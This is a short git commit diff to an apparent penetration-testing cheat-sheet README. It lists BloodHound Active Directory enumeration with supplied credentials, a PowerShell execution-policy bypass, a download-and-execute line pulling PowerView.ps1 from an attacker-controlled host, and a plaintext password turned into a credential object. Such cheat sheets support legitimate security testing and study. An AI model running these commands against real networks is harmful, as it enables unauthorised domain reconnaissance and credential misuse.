Update README.md

This commit is contained in:
Joe Totes
2022-09-06 21:50:45 -04:00
committed by GitHub
parent dddbd89252
commit b65faf6cf7

View File

@@ -665,6 +665,7 @@ sudo neo4j console # LHOST
sudo python3 /opt/BloodHound.py/bloodhound.py -u '{USERNAME}' -p '{PASSWORD}' -ns {IP ADDRESS} -d {DOMAIN} -c all
# Powerview example
powershell -ExecutionPolicy Bypass
IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1")
$pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('{DOMAIN}\{USERNAME}', $pass)